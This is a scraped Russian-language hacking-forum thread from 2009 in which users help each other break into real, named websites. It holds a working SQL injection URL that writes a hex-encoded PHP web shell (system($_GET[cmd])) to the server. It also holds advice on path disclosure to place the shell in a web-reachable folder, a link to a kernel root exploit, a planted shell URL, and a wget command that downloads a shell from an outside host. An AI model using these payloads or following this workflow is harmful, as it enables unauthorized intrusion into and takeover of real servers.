Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

30.11.2009, 11:23
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Подскажите, может кто-то видел эксплоит на
uname -a: Linux 2.6.27.12-170.2.5.fc10.i686 #1 SMP Wed Jan 21 02:09:37 EST 2009 i686
|
|
|

30.11.2009, 12:06
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
Сообщение от Byrger
Подскажите, может кто-то видел эксплоит на
uname -a: Linux 2.6.27.12-170.2.5.fc10.i686 #1 SMP Wed Jan 21 02:09:37 EST 2009 i686
http://milw0rm.com/exploits/9479
|
|
|

30.11.2009, 18:23
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме: 224604
Репутация:
19
|
|
Сори,что тут пишу, вопрос в один ответ. подскажите плз файл-сервер с прямой ссылкой на закачаный мной файл.
|
|
|

30.11.2009, 18:46
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме: 472147
Репутация:
211
|
|
давно хотел спросить... и вот наконец решился) вообщем ситуация такая....
сервак работает под рутом!
залил с помощю into outfile в /tmp/freek8.php сстроку такого содержания-->
<? php system($_GET[cmd]); ?>
http://www.motorama.be/show.php?id=-117+union+select+1,2,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,4,5,6,7,8,9,10,11, 12,13,14,15,16,17+from+mysql.user+into+outfile+'/tmp/freek8.php'/*
потом проверил записалось ли...
http://www.motorama.be/show.php?id=-117+union+select+1,2,load_file('/tmp/freek8.php'),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
но теперь то што дальше? я так понимаю надо раскрыть полный путь к файлу /tmp/freek8.php
какие есть способы?
вообщем подсказуйте хто што знает)
Последний раз редактировалось 547; 30.11.2009 в 18:48..
|
|
|

30.11.2009, 18:47
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме: 224604
Репутация:
19
|
|
Сообщение от 547
давно хотел спросить... и вот наконец решился) вообщем ситуация такая....
сервак работает под рутом!
залил с помощю into outfile в /tmp/freek8.php сстроку такого содержания-->
<? php system($_GET[cmd]); ?>
http://www.motorama.be/show.php?id=-117+union+select+1,2,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,4,5,6,7,8,9,10,11, 12,13,14,15,16,17+from+mysql.user+into+outfile+'/tmp/freek8.php'/*
но теперь то што дальше? я так понимаю надо раскрыть полный путь к файлу /tmp/freek8.php
какие есть способы?
вообщем подсказуйте хто што знает)
Что значит сервак работает под рутом? у веб сервера id=0? Сомневаюсь... Отсюда вопрос:
а права web сервера пустят тебя в эту папку?
Найди путь к сайту и залей шелл туда.
Права у базы - рут,насколько я понял - это не рут системы...
Последний раз редактировалось p.r0phe.t; 30.11.2009 в 18:53..
|
|
|

30.11.2009, 19:05
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме: 224604
Репутация:
19
|
|
Сообщение от 547
хммм... может ты и прав...
но раз я залил шел в папку tmp то можно попробовать выполнить код?
надо только выяснить полный путь к директории..
это и есть полный путь к директории.
Найди в скриптах сайта ошибку,которая выдаст путь к директории сайта,либо через тот же лоадфайл перебором, и лей шелл туда. Как от веб сервера обратиться к папке темп сам бы послушал,если такое возможно. Думаю функцией include,которую опять же нужно найти.
Последний раз редактировалось p.r0phe.t; 30.11.2009 в 19:12..
|
|
|

30.11.2009, 19:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
1 http://madnet.name/tools/madss/
2 http://cacpe.be/index.php?page[]=
3 http://motorama.be/yaneshell.php
$ uname -a
Linux motorama.be 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006 i686 i686 i386 GNU/Linux
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|

30.11.2009, 21:46
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от 547
блин...
да несовсем в танке на самом деле... коешто понимаю... ну скулю то я найшел.
я просто непойму как он вообще выполнил там скрипт шелла?
to l1ght
и раз турки его уже прибрали может можно раскрыть карты?
Он же расписал все по пунктам.
1. Юзаем тулзу от меднета http://madnet.name/tools/madss/, которая сканит сайт.
2. Видим там это, http://cacpe.be/index.php?page[]=, то есть раскрытие путей.
3. Льем шелл не в папку /tmp, а папку, которую показало нам раскрытие, и которая доступна из веба, то есть
Код:
Warning: Illegal offset type in isset or empty in /var/www/html/index.php on line 118
_______
А, ну да, madss показывает соседей + директории)
_______
Либо у меня руки кривые, либо он через sock_sendpage() не рутается)
_______
Да нет, все таки у меня руки кривые, ибо кто-то уже чмод 777 / -R выполнил)
Последний раз редактировалось mailbrush; 30.11.2009 в 22:29..
Причина: upd2
|
|
|

01.12.2009, 00:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
wget -O /papka/na/servere/shell.php http://shell.in/shell.txt
Последний раз редактировалось RulleR; 01.12.2009 в 00:53..
|
|
|

01.12.2009, 00:52
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
Сообщение от RulleR
wget -o /papka/na/servere/shell.php http://shell.in/shell.txt
wget -O
Регист важен.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|